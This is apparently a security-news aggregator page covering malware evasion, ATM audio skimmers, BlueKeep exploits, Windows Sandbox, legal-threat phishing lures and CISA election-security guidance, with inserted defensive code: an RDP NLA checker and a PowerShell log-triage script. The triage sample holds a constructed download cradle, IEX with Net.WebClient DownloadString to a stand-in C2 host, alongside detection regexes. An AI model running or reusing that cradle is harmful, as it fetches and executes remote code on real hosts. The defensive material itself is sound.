For the sake of correctness, as Chronicle Security states, Virustotal is not a “comparative metrics between different antivirus products”, so this result does not imply anything about the overall antivirus solutions quality. Conservatively, it provides a clue about an inner detection mechanisms, showing how attackers bypass some identification logic; not the whole AV solution.

Figure 12. Detection rate decrease thanks to certificate addition

The low-level diff analysis between the two samples confirms the certificate addition does not impact in any way the functional parts of the malware and, therefore, its behavior.

Figure 13. Comparison between samples without and with fake certificate at hex level

Conclusion

The shown techniques are only a part of the countless escamotage implemented by threat actors to make detection harder. We constantly observe attack attempts using these kind of tricks and we are still surprised to see how, nowadays, they can frequently decrease the detection rate, even if the tricks are well known.

We hope that shining a light on a few of these tricks pushes the eternal cat-and-mouse game between defenders and cyber-criminals a little further, raising the bar and the cost for the attackers threatening users and companies.

Further technical details, including IoCs and Yara rules are reported in the original analysis published on the Yoroi blog:

https://blog.yoroi.company/research/playing-cat-and-mouse-three-techniques-abused-to-avoid-detection/



Pierluigi Paganini

Tags: malware, avoid detection

Read Full Article

Carders Prefer Audio Skimmers over Less Efficient Flash Skimmers

Read Full Article

Although web skimming attacks are rampant these days, the underground market for physical card skimming devices is thriving and changing at the rate of technological advancements.

Card skimming is when cybercriminals add their own spying equipment to an automated teller machine (ATM) or point-of-sale system (PoS) to copy the information they process from credit or debit cards.

Offline carders organize in closed networks

Known as “real/offline carding,” this technique is ancient and has been giving headaches to both banks and the customers that got their cards copied.

Closed communities of professional skimmers have evolved into networks that provide both logistics and information for running card skimming operations. They have engineers, cashers, extractors, technicians, decoders, and vendors, all contributing their expertise, products, and services.

The typical targets include ATMs, PoS terminals, and gas stations, according to a report from Advanced Intelligence (AdvIntel) a fraud prevention company based in New York.

Exclusive skimming networks rely on technological advancements to develop, upgrade, and sell top-of-the-line products that are both powerful and stealthy.

Audio skimmers

Yelisey Boguslaskiy, director of security research at AdvIntel, monitored these markets and noticed a preference among criminals for audio skimmers. This was based on information from reputable shops and source intelligence.

At a price of about $1,500, audio skimmers are not a new thing. They have been around since 2010, and the method they use was described as early as 1992.

These devices capture the data and usually encrypt it, then store it in MP3 format. Because of the encryption, that price is just the first payment: sellers also charge for the decryption, without which the data is useless for cloning cards or for online purchases.

Fast swiping with upgraded version

Audio skimmers turn into a more potent kit when fitted with a camera that captures the card's PIN, becoming what is known as a video skimmer. The set is popular on Russian-speaking underground forums because it can be installed more quickly.

Flash audio skimmers are the upgraded variant of audio skimming gadgets and can cost more than $2,000.

“They use timing-calculating algorithms to “reed” the audio when the card is being scanned by the ATM, which allows them to decode a track in 1-2 seconds and immediately convert it into text format,” Boguslaskiy explains.

Furthermore, they can run uninterrupted for more than 20 hours and have a recording capacity of 500 dumps – that is full data from the tracks on the card’s magnetic stripe.

Smartphones and Bluetooth technology have also seen increased adoption among Russian skimmers. Boguslaskiy says that one actor offered instructions on how to build a skimming assembly using an off-the-shelf Bluetooth card reader and an Android smartphone.

BT009 card reader – priced $250-$400

Basically, the skimmer sends the information it captures to the smartphone. This way, the fraudster can touch the ATM only once and then sit in its vicinity to receive the dumps.

The researcher says that the trend is clearly against flash skimmers, a cheaper variant ($300-$500) that fits into the bezel of an ATM to read the cards. The reason is that they are not as efficient as the audio version.

Apart from being more vulnerable to radio jamming and jittering, they have a low reading rate of just up to 50% of the cards.

Dedicated shops

Sellers of card skimming ‘ware’ have dedicated websites where they offer all the kits necessary for slurping data on the card when clients put their plastic in an ATM.

Technological advancements give “lone-wolf” cybercriminals the opportunity to build card readers using off-the-shelf components. This offers them a ticket into private circles, some of them in the business for more than 10 years.

“Russian-speaking real carding communities have traditionally been exclusive and tight-lipped regarding their skimming operations. Skimming developers form exclusive trusted underground criminal networks thereby connecting talented engineers, their trusted sellers, and wealthy carder buyers of such tools,” says Boguslaskiy.

Read Full Article

PoC Exploits for CVE-2019-0708 wormable Windows flaw released online

Read Full Article

Several security experts have developed PoC exploits for the Windows Remote Desktop Services flaw tracked as CVE-2019-0708 and dubbed BlueKeep.

Experts have developed several proof-of-concept (PoC) exploits for the recently patched Windows Remote Desktop Services (RDS) vulnerability tracked as CVE-2019-0708 and dubbed BlueKeep.

One of the PoC exploits could be used for remote code execution on vulnerable systems.

Microsoft Patch Tuesday updates for May 2019 address nearly 80 vulnerabilities, including a Windows zero-day flaw and an RDS vulnerability that can be exploited to carry out a worm-like attack.

The issue is a remote code execution flaw in Remote Desktop Services (RDS) that can be exploited by an unauthenticated attacker who connects to the targeted system over RDP and sends specially crafted requests.

As explained by Microsoft, the vulnerability is wormable: it can be exploited without any user interaction, so self-propagating malware could use it to spread in an uncontrolled way across target networks.

Windows 8 and Windows 10 are not affected, but earlier versions are exposed to attack.

Microsoft also advised Windows Server users to block TCP port 3389 at the perimeter and to enable Network Level Authentication (NLA), which forces the client to authenticate before a session is created and so keeps an unauthenticated attacker from reaching the vulnerable code.

The issue poses a serious risk to organizations and industrial environments due to the presence of a large number of systems that could be reached via RDS.

Not all of the publicly released exploits are fully working: some of them reach the vulnerable code path without causing any harm.

Experts at the SANS Institute observed two partial exploits that are publicly available.

“Several security vendors stated publicly that they developed exploits internally that will at least trigger a denial of service condition (blue screen). Currently, there are at least two public partial exploits.” reads the blog post published by the SANS Institute, “One triggers the “vulnerable path” without triggering a blue screen or causing any other damage. It can be adjusted to play with the “channel” parameter to create normal and exploit traffic. The second one also triggers the vulnerability without any intended ill effect. The second exploit has been made available in the form of a stand-alone vulnerability scanner.”

Anyway, some researchers have created exploits to remotely execute code on vulnerable systems.
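
Microsoft's NLA advice can be verified from the network without touching the vulnerable code path. The following Python is an added example, not part of the article or of the SANS post: it builds the X.224 Connection Request that opens every RDP session (MS-RDPBCGR 2.2.1.1) asking only for standard RDP security, parses the server's Connection Confirm (2.2.1.2) and classifies the answer. A server enforcing NLA refuses with RDP_NEG_FAILURE code HYBRID_REQUIRED_BY_SERVER; a server that accepts standard security, or an old server that sends no negotiation data at all, still offers the unauthenticated pre-logon surface that BlueKeep exploits. The three sample responses at the bottom are constructed; probe() is the live version, for hosts you are authorised to test.

```python
"""Added example (not from the Security Affairs post): build the X.224
Connection Request that opens an RDP session, parse the server's Connection
Confirm, and tell whether the host enforces NLA, the mitigation Microsoft
recommends for CVE-2019-0708. The request asks only for standard RDP
security; an NLA-enforcing server refuses it with HYBRID_REQUIRED_BY_SERVER.
Field layouts follow MS-RDPBCGR 2.2.1.1 / 2.2.1.2; samples are constructed."""
import socket
import struct

PROTOCOL_RDP = 0x00000000        # standard RDP security (no TLS, no CredSSP)
TYPE_RDP_NEG_RSP = 0x02
TYPE_RDP_NEG_FAILURE = 0x03
FAILURE_CODES = {
    1: "SSL_REQUIRED_BY_SERVER", 2: "SSL_NOT_ALLOWED_BY_SERVER",
    3: "SSL_CERT_NOT_ON_SERVER", 4: "INCONSISTENT_FLAGS",
    5: "HYBRID_REQUIRED_BY_SERVER", 6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def build_connection_request(requested=PROTOCOL_RDP, cookie="mstshash=probe"):
    """TPKT header + X.224 CR TPDU + routing cookie + RDP_NEG_REQ."""
    cookie_bytes = ("Cookie: %s\r\n" % cookie).encode()
    neg_req = struct.pack("<BBHI", 0x01, 0x00, 8, requested)   # type, flags, len, protocols
    x224 = struct.pack("<BHHB", 0xE0, 0, 0, 0) + cookie_bytes + neg_req
    x224 = bytes([len(x224)]) + x224              # LI counts everything after it
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224


def parse_connection_confirm(data):
    """Return {'kind': 'rsp'|'failure'|'legacy', 'code': int|None}."""
    if len(data) < 11 or data[0] != 3:
        raise ValueError("not a TPKT packet")
    tpkt_len = struct.unpack_from(">H", data, 2)[0]
    li, tpdu_type = data[4], data[5]
    if tpdu_type != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    if li < 14 or tpkt_len < 19:                   # no rdpNegData: pre-5.1 server
        return {"kind": "legacy", "code": None}
    neg_type, _flags, length, value = struct.unpack_from("<BBHI", data, 11)
    if length != 8:
        raise ValueError("malformed rdpNegData")
    if neg_type == TYPE_RDP_NEG_RSP:
        return {"kind": "rsp", "code": value}      # selectedProtocol
    if neg_type == TYPE_RDP_NEG_FAILURE:
        return {"kind": "failure", "code": value}  # failureCode
    raise ValueError("unknown rdpNegData type 0x%02x" % neg_type)


def classify(confirm):
    """Interpret the answer to a request for standard RDP security only."""
    if confirm["kind"] == "failure" and confirm["code"] == 5:
        return "nla-enforced"
    if confirm["kind"] == "failure" and confirm["code"] == 1:
        return "tls-required-no-nla"               # still reachable before logon
    if confirm["kind"] in ("rsp", "legacy"):
        return "standard-rdp-accepted"             # unauthenticated attack surface
    return "failure:" + FAILURE_CODES.get(confirm["code"], str(confirm["code"]))


def probe(host, port=3389, timeout=5.0):
    """Live check against a host you are authorised to test."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_connection_request())
        return classify(parse_connection_confirm(s.recv(64)))


# Constructed server answers, laid out exactly as a server would send them:
# TPKT(4) | LI, 0xD0, dst-ref, src-ref, class | rdpNegData(8, optional)
SAMPLE_NLA_REQUIRED = (b"\x03\x00\x00\x13" + b"\x0e\xd0\x00\x00\x12\x34\x00"
                       + b"\x03\x00\x08\x00" + b"\x05\x00\x00\x00")
SAMPLE_STANDARD_OK = (b"\x03\x00\x00\x13" + b"\x0e\xd0\x00\x00\x12\x34\x00"
                      + b"\x02\x00\x08\x00" + b"\x00\x00\x00\x00")
SAMPLE_LEGACY = b"\x03\x00\x00\x0b" + b"\x06\xd0\x00\x00\x12\x34\x00"

if __name__ == "__main__":
    for name, sample in [("nla", SAMPLE_NLA_REQUIRED), ("std", SAMPLE_STANDARD_OK),
                         ("old", SAMPLE_LEGACY)]:
        print(name, classify(parse_connection_confirm(sample)))
```

Hosts that come back as standard-rdp-accepted or tls-required-no-nla are the ones where patching, or at least blocking 3389, cannot wait: anyone who can open the TCP port can reach the code the PoCs target.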

Read Full Article

Using the Windows Sandbox to Stay Safe Online

Read Full Article

Windows Sandbox

One of the more interesting features of Windows 10 version 1903, otherwise known as the May 2019 Update, is the Windows Sandbox. The Windows Sandbox is a lightweight Windows 10 virtual machine that can be launched quickly so you can test downloaded programs, browser extensions, and suspect sites without risk of infecting your normal Windows operating system.

For those who are security conscious and do not want to deal with installing a dedicated virtual machine program like VirtualBox, Hyper-V, or VMWare, you can instead install Windows Sandbox for a very basic Windows 10 virtual machine.

While this feature brings terrific functionality to those who do not want to maintain a dedicated machine to test programs, it could be improved, which we will discuss at the end of the article.

Installing the Windows Sandbox

Before you can install the Windows Sandbox, you first need to make sure your computer meets certain requirements. These are:

  • Windows 10 Pro or Enterprise build 1903 or later. There are ways to get it installed on Windows 10 Home, but those require a little extra work, which will not be covered in this article.
  • AMD64 architecture
  • Virtualization capabilities enabled in BIOS
  • At least 4GB of RAM (8GB recommended)
  • At least 1 GB of free disk space (SSD recommended)
  • At least 2 CPU cores (4 cores with hyperthreading recommended)

To install Windows Sandbox, simply follow these steps:

  1. Make sure you are using Windows 10 Pro or Enterprise running version 1903 or later.
  2. Make sure CPU’s virtualization is enabled in the computer’s BIOS.
  3. Click the Start button and search for Windows Features. When it appears in the search results, click on the Turn Windows features on or off control panel result.

    Open Windows Features Control Panel
  4. When the Windows Features control panel opens, scroll down and put a check in the box next to Windows Sandbox and then press the OK button.

    Add Windows Sandbox Feature
  5. After it has finished installing, Windows may ask you to reboot. Please allow it to do so.

The Windows Sandbox is now installed.

Using the Windows Sandbox

To use the Windows Sandbox, click on the Start button and search for Windows Sandbox. When it appears in the search results, click on it to launch the program.

When the Windows Sandbox loads for the first time, it may take a bit longer than normal as it generates the Windows 10 image it will use for the virtual machine. Once loaded, you will be presented with a window that contains a fully functional base Windows 10 installation as shown below.

The Windows Sandbox

With the Windows Sandbox running, you can easily transfer files that you want to be tested or copy text to and from its clipboard. To transfer a file from your main Windows operating system (the Host), simply right-click on a file you want to transfer and select Copy.

Copy file on the Host

Now, go in the Windows Sandbox (the Guest) and right-click on the desktop and click on Paste to transfer the file from your Host.  

Transferring text between the Host machine and the Guest sandbox is easy as well, just copy text into the clipboard from either the main OS or the Sandbox and paste it into the other.

As an example of how the Windows Sandbox could be used, I just visited a site that stated I needed an Adobe Flash Player update. It looked a little fishy, so instead of running it on my main machine, I can fire up the Windows Sandbox and transfer the file there to test it.

I was lucky, because as you can see, this sure looks like an adware bundle rather than a Flash Player Update and is not something I would want to run on my normal computer. That’s because adware bundles have started to commonly install malware such as ransomware, miners, and password-stealing Trojans.

Windows Sandbox with Adware Bundle.

The good news is that anything you try out in the Windows Sandbox is discarded when you close it and leaves no trace on your normal computer. So you can run any program you download, malware or otherwise, or visit a web site, and close the Sandbox when done. Two caveats: the Sandbox has network access by default, so whatever you run there can still reach the internet and hosts on your local network, and it shares the clipboard with the host, as discussed below.

The next time you start it again, the Sandbox will be reset back to its default state so you can test more programs.

The Windows Sandbox is great, but could be better

Let me start out by saying I love the Windows Sandbox.

It is very easy to use, it allows users to quickly get a Windows 10 virtual machine up and running, and is accessible to users of all skill levels. This makes it very easy to test programs you download from the web or web browser extensions.

My only gripe is that it could be even better if we could easily use it to test malicious Office email attachments.

Malicious Word and Excel email attachments have become a very common method used to distribute malware such as ransomware, banking trojans, password-stealing Trojans, backdoors, downloaders, miners, and more.

Unfortunately, the Windows Sandbox only consists of a base operating system and no additional applications. This makes it impossible to test malicious Office documents such as Word and Excel documents without installing Office into the sandbox.

As the virtual machine is reset back to the default base image every time you close it, it can be a real pain if you want to use the Windows Sandbox to test email attachments.

It would be great if Microsoft included some way of testing malicious attachments. With that feature added, the Windows Sandbox would be incredibly useful for all users.

One other concern I have is that the Windows Sandbox can read the contents of your Host operating system’s clipboard. This means that if your Host has a password, or other sensitive information, saved to the clipboard, anything you run in the Sandbox will be able to access it. 

To fix this, it would be nice if we had easy controls to control how clipboard data is transferred.

Read Full Article

Legal Threats Make Powerful Phishing Lures

Read Full Article

Some of the most convincing email phishing and malware attacks come disguised as nastygrams from a law firm. Such scams typically notify the recipient that he/she is being sued, and instruct them to review the attached file and respond within a few days — or else. Here’s a look at a recent spam campaign that peppered more than 100,000 business email addresses with fake legal threats harboring malware.

On or around May 12, at least two antivirus firms began detecting booby-trapped Microsoft Word files that were sent along with some variation of the following message:

{Pullman & Assoc. | Wiseman & Assoc.| Steinburg & Assoc. | Swartz & Assoc. | Quartermain & Assoc.} <[email protected]>

Hi,

The following {e-mail | mail} is to advise you that you are being charged by the city.

Our {legal team | legal council | legal departement} has prepared a document explaining the {litigation | legal dispute | legal contset}.

Please download and read the attached encrypted document carefully.

You have 7 days to reply to this e-mail or we will be forced to step forward with this action.

Note: The password for the document is 123456

The template above was part of a phishing kit being traded on the underground, and the user of this kit decides which of the options in brackets actually get used in the phishing message.

Yes, the spelling/grammar is poor and awkward (e.g., the salutation), but so is the overall antivirus detection rate of the attached malicious Word document. This phishing kit included five booby-trapped Microsoft Word documents to choose from, and none of those files are detected as malicious by more than three of the five dozen or so antivirus products that scanned the Word docs on May 22 — 10 days after they were spammed out.

According to both Fortinet and Sophos, the attached Word documents include a trojan that is typically used to drop additional malware on the victim’s computer. Previous detections of this trojan have been associated with ransomware, but the attackers in this case can use the trojan to install malware of their choice.

Also part of the phishing kit was a text document containing some 100,000 business email addresses — most of them ending in Canadian (.ca) domains — although there were also some targets at companies in the northeastern United States. If only a tiny fraction of the recipients of this scam were unwary enough to open the attachment, it would still be a nice payday for the phishers.

The law firm domain spoofed in this scam — wpslaw.com — now redirects to the Web site for RWC LLC, a legitimate firm based in Connecticut. A woman who answered the phone at RWC said someone had recently called to complain about a phishing scam, but beyond that the firm didn’t have any knowledge of the matter.

As phishing kits go, this one is pretty basic and not terribly customized or convincing. But I could see a kit that tried only slightly harder to get the grammar right and more formally address the recipient doing quite well: Legitimate-looking legal threats have a way of making some people act before they think.

Don’t be like those people. Never open attachments in emails you were not expecting. When in doubt, toss it out. If you’re worried it may be legitimate, research the purported sender(s) and reach out to them over the phone if need be. And resist the urge to respond to these spammers; doing so may only serve to encourage further “mailious” correspondence.

KrebsOnSecurity would like to thank Hold Security for a heads up on this phishing kit.

Read Full Article

ST19-002: Best Practices for Securing Election Systems

Read Full Article
Original release date: May 21, 2019 | Last revised: May 22, 2019


By adhering to cybersecurity best practices, election organizations—including state, local, tribal, and territorial (SLTT) governments—can improve the security of their election systems. The Cybersecurity and Infrastructure Security Agency (CISA) Hunt and Incident Response Team (HIRT) developed the best practices in this tip from lessons learned through engagements with SLTT governments, election stakeholders, and others. Organizations can implement these best practices, which harden enterprise networks and strengthen election infrastructure, at little or no cost. CISA’s election systems best practices cover the following topics:

Software and Patch Management

Implementing an enterprise-wide software and patch management program reduces the likelihood of an organization experiencing significant cybersecurity incidents. A software and patch management program includes the establishment of an enterprise-wide inventory list, which provides an organization with greater insight into the software running on its networks and associated vulnerabilities. The organization can then use the inventory list to help identify and mitigate the risks to its election-related information technology (IT) infrastructure. Mitigations often include implementing application whitelisting, a best practice. (See Implementing Application Whitelisting.)

CISA has observed a correlation between the absence of a patch management program and the partial or complete compromise of an enterprise network due to the presence of commodity malware. Commodity malware is widely available, has minimal or no customization, and is used by a wide range of threat actors. A partial or complete compromise could lead to additional impacts, including ransomware infection and the theft of sensitive data, which may include personally identifiable information.

Failure to deploy patches in a timely manner can make an organization a target of opportunity, even for less sophisticated actors, increasing the risk of compromise. If an enterprise-wide patch management solution is too costly, an organization should consider enabling automatic updates. CISA recommends organizations subscribe to the National Cybersecurity Awareness System for alerts about security updates, threats, and vulnerabilities. This will assist organizations in maintaining situational awareness of critical vulnerabilities present in software widely used throughout their enterprise environments. It is vital to act quickly to apply patches, especially if there is an associated vulnerability being exploited.

Log Management

Retaining and adequately securing logs from both network devices and local hosts supports triage and remediation of cybersecurity events. An organization can analyze the logs to determine the impact of cybersecurity events and ascertain whether an incident has occurred.

Centralized Log Management

Organizations should set up centralized log management:

  • Forward logs from local hosts to a centralized log management server—often referred to as a security information and event management (SIEM) tool. CISA has observed threat actors attempting to delete local logs to remove on-site evidence of their activities. By sending logs to a SIEM tool, an organization can reduce the likelihood of malicious log deletion.
  • Correlate logs from both network and host security devices. By reviewing logs from multiple sources, an organization can better triage an individual event and determine its impact to the organization as a whole.
  • Review both centralized and local log management policies to maximize efficiency and retain historical data. CISA recommends that organizations retain critical logs for a minimum of one year, if possible.

Update PowerShell and Enable Advanced Logging

In addition to setting up centralized logging, organizations should ensure that instances of PowerShell are logging activity. PowerShell is a cross-platform command-line shell and scripting language that is a component of Microsoft Windows. CISA has observed threat actors, including APT actors, using PowerShell to hide their malicious activities.  

  • Update PowerShell instances to version 5.0 or later and uninstall all earlier PowerShell versions. Logs from PowerShell prior to version 5.0 are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities.
  • Ensure PowerShell 5.0 instances have module, script block, and transcription logging enabled.
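
Once script block logging is on, event 4104 in Microsoft-Windows-PowerShell/Operational carries the text of every script block PowerShell compiles, split into MessageNumber/MessageTotal fragments when it is long. The following Python is an added example, not part of the CISA tip: it reassembles fragments from exported event XML, decodes -EncodedCommand arguments (base64 of UTF-16LE text, the usual way actors hide a one-liner) and flags download cradles and Invoke-Expression. The events and the c2.example.invalid URL are constructed; the event schema and field names are the real ones, as produced by `wevtutil qe ... /f:xml` or `Get-WinEvent` plus ToXml().

```python
"""Added example (not from the CISA tip): what script block logging gives a
defender once it is on. PowerShell 5+ writes every compiled script block to
Microsoft-Windows-PowerShell/Operational as event 4104, splitting long blocks
into MessageNumber/MessageTotal fragments. This reassembles fragments from
exported event XML, unpacks -EncodedCommand payloads (base64 of UTF-16LE)
and flags download cradles. The events below are constructed sample data."""
import base64
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
ENC_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
SUSPICIOUS = [
    ("download-cradle", re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest", re.I)),
    ("invoke-expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("base64-decode", re.compile(r"FromBase64String", re.I)),
    ("encoded-command", ENC_ARG),
]


def event_xml(event_id, computer, fields):
    """Build one exported event in the Windows event schema (sample data)."""
    data = "".join('<Data Name="%s">%s</Data>' % (k, escape(str(v)))
                   for k, v in fields.items())
    return ('<Event xmlns="%s"><System><Provider Name="Microsoft-Windows-PowerShell"/>'
            '<EventID>%d</EventID><Computer>%s</Computer></System>'
            '<EventData>%s</EventData></Event>' % (NS["e"], event_id, computer, data))


def decode_encoded_command(b64):
    """-EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64decode(b64).decode("utf-16-le")


def reassemble_script_blocks(xml_events):
    """{(computer, ScriptBlockId): full text} for blocks whose fragments all arrived."""
    parts = {}
    for raw in xml_events:
        ev = ET.fromstring(raw)
        if ev.findtext("e:System/e:EventID", namespaces=NS) != "4104":
            continue                                   # 4103 etc. carry no script text
        d = {x.get("Name"): (x.text or "") for x in ev.findall("e:EventData/e:Data", NS)}
        key = (ev.findtext("e:System/e:Computer", namespaces=NS), d["ScriptBlockId"])
        entry = parts.setdefault(key, {"total": int(d["MessageTotal"]), "frag": {}})
        entry["frag"][int(d["MessageNumber"])] = d["ScriptBlockText"]
    blocks = {}
    for key, entry in parts.items():
        if len(entry["frag"]) == entry["total"]:       # fragments are joined in order
            blocks[key] = "".join(entry["frag"][i] for i in sorted(entry["frag"]))
    return blocks


def scan_script_block(text):
    """Indicator names matching the text, plus those found in any
    -EncodedCommand payload it launches (prefixed 'encoded:')."""
    hits = {name for name, rx in SUSPICIOUS if rx.search(text)}
    for b64 in ENC_ARG.findall(text):
        try:
            inner = decode_encoded_command(b64)
        except (ValueError, UnicodeDecodeError):
            continue
        hits |= {"encoded:" + h for h in scan_script_block(inner)}
    return hits


def triage(xml_events):
    """{(computer, ScriptBlockId): sorted indicators} for blocks worth a look."""
    out = {}
    for key, text in reassemble_script_blocks(xml_events).items():
        hits = scan_script_block(text)
        if hits:
            out[key] = sorted(hits)
    return out


# Constructed sample: a benign block, a two-fragment block that launches an
# encoded download cradle, and a 4103 pipeline event that must be ignored.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    event_xml(4104, "WS01", {"MessageNumber": 1, "MessageTotal": 1,
              "ScriptBlockText": "Get-ChildItem C:\\Users | Measure-Object",
              "ScriptBlockId": "11111111-1111-1111-1111-111111111111", "Path": ""}),
    event_xml(4104, "WS02", {"MessageNumber": 2, "MessageTotal": 2,
              "ScriptBlockText": "powershell -nop -w hidden -enc " + ENCODED,
              "ScriptBlockId": "22222222-2222-2222-2222-222222222222", "Path": ""}),
    event_xml(4104, "WS02", {"MessageNumber": 1, "MessageTotal": 2,
              "ScriptBlockText": "$s = Start-Sleep -Seconds 30; ",
              "ScriptBlockId": "22222222-2222-2222-2222-222222222222", "Path": ""}),
    event_xml(4103, "WS02", {"Payload": "CommandInvocation(Get-Date)"}),
]

if __name__ == "__main__":
    for key, indicators in triage(SAMPLE_EVENTS).items():
        print(key, indicators)
```

Without script block logging none of this text exists anywhere on the host; with it, the encoded cradle is visible in clear even though the operator never wrote it to disk, which is why the tip pairs the logging setting with forwarding to a SIEM.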

Network Segmentation

Organizations can limit the impact of a cybersecurity incident by enforcing network segmentation. Proper network segmentation is an effective security mechanism to prevent an intruder from propagating exploits or laterally moving around an internal network. On a poorly segmented network, intruders are able to extend their impact to control critical devices or gain access to sensitive data and intellectual property. Segregation separates network segments based on role and functionality. A securely segregated network can contain malicious occurrences, reducing the impact from intruders in the event that they have gained a foothold somewhere inside the network. (See Securing Network Infrastructure Devices.) During on-site engagements, CISA has observed organizations without effective network segmentation suffer commodity malware compromises of all Windows hosts in their environments.

Organizations should define their distinct organizational components (e.g., human resources, IT administration, demilitarized zone, elections) and create a separate Virtual Local Area Network (VLAN) for each component. Alternatively, if feasible, organizations should implement physical network segmentation for each component. CISA recommends that organizations restrict traffic between VLANs following the principle of least privilege. See below for additional guidance for protecting elections-specific VLANs.

Segment Elections-Related Hosts from the General User Network

  • Use dedicated servers and workstations for elections-related tasks. Organizations should never allow workstations with elections-related roles—such as submitting election results to a reporting server—to be used for general purpose computing, such as browsing the internet. Organizations should ensure up-to-date patching of workstations and servers dedicated to elections-related tasks.
  • Follow the principle of least privilege. Organizations should only allow elections-related VLANs to communicate with machines unrelated to elections on an as-needed basis. Other network traffic should be explicitly denied (e.g., by using a DENY/DENY ruleset).
  • Apply the appropriate technical controls (e.g., implement Group Policy Object [GPO] and firewall rules) to restrict general internet browsing from elections-related workstations and servers.

Block Suspicious Activity

Many organizations set their security devices to alert on suspicious activity instead of blocking it. When an organization does not block suspicious activity by default, it increases the likelihood of adverse events that allow an adversary to compromise IT resources. Organizations should follow best practices in disabling network protocols known to spread malware, such as Server Message Block version 1 (SMB v1). (See SMB Security Best Practices.)

Prevent Malware and Malicious Traffic

Organizations should perform the following actions to block malicious traffic and malware:

  • Enable security features. Many network appliances, cloud services, and security software (e.g., host intrusion prevention systems) have features—not enabled by default—that block malicious traffic. CISA recommends that organizations enable these features. Note: organizations should thoroughly test changes before implementing them in production environments.
  • Scan all incoming emails for malicious attachments and links prior to delivery, and quarantine emails, as necessary.
  • Train employees to recognize phishing attempts and ensure a process exists for reporting and triaging phishing emails.
  • Block macros from running in documents throughout enterprise. (See Who Needs to Exploit Vulnerabilities When You Have Macros? for more information.)
    • Before restricting macro-enabled documents, determine if any users need macro-enabled documents to perform their work functions. If macros are not used, disable them by GPO.
    • If blocking macro-enabled documents across an organization is too restrictive, consider alternative solutions, such as only allowing macro-enabled documents for specific users or blocking macros from running when received as email attachments from external users.

Disable SMB v1

In the course of recent engagements, CISA has observed threat actors using SMB v1 to spread malware across organizations. Based on this specific threat, CISA recommends organizations consider the following actions to protect their networks:

  • Disable SMB v1 internally on their network.
  • Block all versions of SMB at the network boundary by blocking Transmission Control Protocol (TCP) port 445 with related protocols on User Datagram Protocol ports 137–138 and TCP port 139.
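The two SMB v1 actions above on a single Windows host, as an added example that is not from the CISA document: it audits remaining SMB v1 clients before cutting them off, disables and removes the protocol, and adds host firewall rules for the ports the guidance blocks at the boundary (TCP 445, TCP 139, UDP 137-138). The host rules are defence in depth for hosts on untrusted networks, not a replacement for the boundary firewall; it assumes an elevated session on Windows 10 / Server 2016 or later.

```powershell
# Added example (not from the CISA document): audit, disable and remove SMB v1 on a
# host, then add host firewall rules for the SMB ports named in the guidance.
# Assumes an elevated session; feature names differ between client and server SKUs.

function Get-Smb1Status {
    # Returns $true while the server-side SMB1 protocol is still enabled.
    (Get-SmbServerConfiguration).EnableSMB1Protocol
}

function Enable-Smb1Audit {
    # Log every SMB1 client connection (event ID 3000, Microsoft-Windows-SMBServer/Audit)
    # so legacy devices that still depend on it are found before the protocol is removed.
    Set-SmbServerConfiguration -AuditSmb1Access $true -Force
}

function Get-Smb1ClientAccess {
    # Lists clients that have connected over SMB1 since auditing was enabled.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-SMBServer/Audit'; Id = 3000 } `
        -ErrorAction SilentlyContinue | Select-Object TimeCreated, Message
}

function Disable-Smb1 {
    # Disable in the running configuration, then remove the component entirely so
    # it cannot be switched back on by accident.
    Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    $os = Get-CimInstance Win32_OperatingSystem
    if ($os.ProductType -eq 1) {
        Disable-WindowsOptionalFeature -Online -FeatureName 'SMB1Protocol' -NoRestart | Out-Null   # client SKU
    } else {
        Uninstall-WindowsFeature -Name 'FS-SMB1' | Out-Null                                        # server SKU
    }
}

function Add-SmbBlockRules {
    # Host-level mirror of the boundary rules, scoped to the Public profile so roaming
    # hosts cannot talk SMB/NetBIOS over untrusted networks.
    $ports = @(
        @{ Name = 'SMB TCP 445';         Protocol = 'TCP'; Port = 445 },
        @{ Name = 'NetBIOS TCP 139';     Protocol = 'TCP'; Port = 139 },
        @{ Name = 'NetBIOS UDP 137-138'; Protocol = 'UDP'; Port = '137-138' }
    )
    foreach ($p in $ports) {
        New-NetFirewallRule -DisplayName "Block $($p.Name) (Inbound)" -Direction Inbound -Action Block `
            -Protocol $p.Protocol -LocalPort $p.Port -Profile Public | Out-Null
        New-NetFirewallRule -DisplayName "Block $($p.Name) (Outbound)" -Direction Outbound -Action Block `
            -Protocol $p.Protocol -RemotePort $p.Port -Profile Public | Out-Null
    }
}

Enable-Smb1Audit
Get-Smb1ClientAccess          # review this list with the owners of any legacy systems first
Disable-Smb1
Add-SmbBlockRules
Get-Smb1Status                # expected to report False once the change has applied
```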

Credential Management

Managing passwords and using strong passwords are important steps in preventing unauthorized access to databases, applications, and other election infrastructure assets. Multi-factor authentication (MFA), in particular, can help prevent adversaries from gaining access to an organization’s assets even if passwords are compromised through phishing attacks or other means. Threat actors have the capability to defeat single-factor authentication, especially when passwords are weak (e.g., common or trivial passwords) or—taking into account credential reuse—have been exposed in unrelated third-party breaches. CISA has published the following guidance to assist organizations in achieving the goal of fully preventing unauthorized access:

  • Implement MFA to prevent unauthorized access, particularly by external users, including APT actors. (See Using Rigorous Credential Control to Mitigate Trusted Network Exploitation and Supplementing Passwords.) MFA requires users to present two or more credentials (e.g., a password and the use of a hardware token) at login to verify their identity before being granted access to a given system. Organizations should consider implementing MFA for voter registration, election night reporting, and associated enterprise IT systems.
  • Enforce password best practices, including the use of unique and complex passwords to access different systems and accounts. Accounts with additional privileges (e.g., administrator accounts) should have password requirements that are more stringent than those for standard users. (See Choosing and Protecting Passwords.)
